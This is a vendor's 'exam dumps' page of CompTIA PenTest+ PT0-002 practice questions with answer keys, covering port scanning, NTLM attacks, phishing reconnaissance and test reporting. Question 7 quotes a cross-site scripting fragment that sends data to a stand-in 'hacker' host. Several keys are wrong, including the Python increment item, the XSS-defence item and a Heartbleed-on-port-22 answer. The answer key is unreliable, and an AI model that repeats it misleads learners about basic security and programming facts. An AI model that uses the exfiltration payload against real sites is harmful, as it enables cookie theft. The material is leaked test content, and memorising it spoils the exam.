PT0-002 Premium Bundle

CompTIA PenTest+ Certification Exam

110 Questions (Practice Tests)
110 PDF (Print version)
Last update: November 21, 2024

CompTIA PT0-002 Free Practice Questions

Want to know Actualtests PT0-002 exam practice test features? Want to learn more about the CompTIA PenTest+ Certification Exam certification experience? Study practical CompTIA PT0-002 answers to updated PT0-002 questions at Actualtests. Get success with an absolute guarantee to pass the CompTIA PT0-002 (CompTIA PenTest+ Certification Exam) test on your first attempt.

Free demo questions for CompTIA PT0-002 Exam Dumps Below:

NEW QUESTION 1
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
PT0-002 dumps exhibit

Solution:
Part 1 - nmap 192.168.2.2 -sV -O
Part 2 - Weak SMB file permissions

Does this meet the goal?
  • A. Yes
  • B. Not Mastered

Answer: A

NEW QUESTION 2
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.
Which of the following actions, if performed, would be ethical within the scope of the assessment?

  • A. Exploiting a configuration weakness in the SQL database
  • B. Intercepting outbound TLS traffic
  • C. Gaining access to hosts by injecting malware into the enterprise-wide update server
  • D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates
  • E. Establishing and maintaining persistence on the domain controller

Answer: B

NEW QUESTION 3
Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

  • A. NIST SP 800-53
  • B. OWASP Top 10
  • C. MITRE ATT&CK framework
  • D. PTES technical guidelines

Answer: C

NEW QUESTION 4
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

  • A. PLCs will not act upon commands injected over the network.
  • B. Supervisors and controllers are on a separate virtual network by default.
  • C. Controllers will not validate the origin of commands.
  • D. Supervisory systems will detect a malicious injection of code/commands.

Answer: C

NEW QUESTION 5
Which of the following expressions in Python increase a variable val by one? (Choose two.)

  • A. val++
  • B. +val
  • C. val=(val+1)
  • D. ++val
  • E. val=val++
  • F. val+=1

Answer: DF

NEW QUESTION 6
A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the server?

  • A. Perform vertical privilege escalation.
  • B. Replay the captured traffic to the server to recreate the session.
  • C. Use John the Ripper to crack the password.
  • D. Utilize a pass-the-hash attack.

Answer: D

NEW QUESTION 7
Given the following code:
[removed]var+img=new+Image();img.src=”http://hacker/ + [removed];[removed]
Which of the following are the BEST methods to protect against this type of attack? (Choose two.)

  • A. Web-application firewall
  • B. Parameterized queries
  • C. Output encoding
  • D. Session tokens
  • E. Input validation
  • F. Base64 encoding

Answer: BE

NEW QUESTION 8
A penetration tester runs a scan against a server and obtains the following output:
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-12-20 09:23AM 331 index.aspx
| ftp-syst:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2012 Std
3389/tcp open ssl/ms-wbt-server
| rdp-ntlm-info:
| Target Name: WEB3
| NetBIOS_Computer_Name: WEB3
| Product_Version: 6.3.9600
|_ System_Time: 2021-01-15T11:32:06+00:00
8443/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
Which of the following command sequences should the penetration tester try NEXT?

  • A. ftp 192.168.53.23
  • B. smbclient \\WEB3\IPC$ -I 192.168.53.23 -U guest
  • C. ncrack -u Administrator -P 15worst_passwords.txt -p rdp 192.168.53.23
  • D. curl -X TRACE https://192.168.53.23:8443/index.aspx
  • E. nmap --script vuln -sV 192.168.53.23

Answer: A

NEW QUESTION 9
Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)

  • A. The CVSS score of the finding
  • B. The network location of the vulnerable device
  • C. The vulnerability identifier
  • D. The client acceptance form
  • E. The name of the person who found the flaw
  • F. The tool used to find the issue

Answer: CF

NEW QUESTION 10
A penetration tester has been given eight business hours to gain access to a client’s financial system. Which of the following techniques will have the highest likelihood of success?

  • A. Attempting to tailgate an employee going into the client's workplace
  • B. Dropping a malicious USB key with the company’s logo in the parking lot
  • C. Using a brute-force attack against the external perimeter to gain a foothold
  • D. Performing spear phishing against employees by posing as senior management

Answer: C

NEW QUESTION 11
The results of an Nmap scan are as follows:
PT0-002 dumps exhibit
Which of the following would be the BEST conclusion about this device?

  • A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.
  • B. This device is most likely a gateway with in-band management services.
  • C. This device is most likely a proxy server forwarding requests over TCP/443.
  • D. This device may be vulnerable to remote code execution because of a buffer overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.

Answer: A

NEW QUESTION 12
During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client’s cybersecurity tools? (Choose two.)

  • A. Scraping social media sites
  • B. Using the WHOIS lookup tool
  • C. Crawling the client’s website
  • D. Phishing company employees
  • E. Utilizing DNS lookup tools
  • F. Conducting wardriving near the client facility

Answer: BC

NEW QUESTION 13
A penetration tester received a .pcap file to look for credentials to use in an engagement. Which of the following tools should the tester utilize to open and read the .pcap file?

  • A. Nmap
  • B. Wireshark
  • C. Metasploit
  • D. Netcat

Answer: B

NEW QUESTION 14
An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

  • A. OpenVAS
  • B. Drozer
  • C. Burp Suite
  • D. OWASP ZAP

Answer: A

NEW QUESTION 15
A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

  • A. As backup in case the original documents are lost
  • B. To guide them through the building entrances
  • C. To validate the billing information with the client
  • D. As proof in case they are discovered

Answer: D

NEW QUESTION 16
A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

  • A. Implement a recurring cybersecurity awareness education program for all users.
  • B. Implement multifactor authentication on all corporate applications.
  • C. Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.
  • D. Implement an email security gateway to block spam and malware from email communications.

Answer: A

NEW QUESTION 17
......
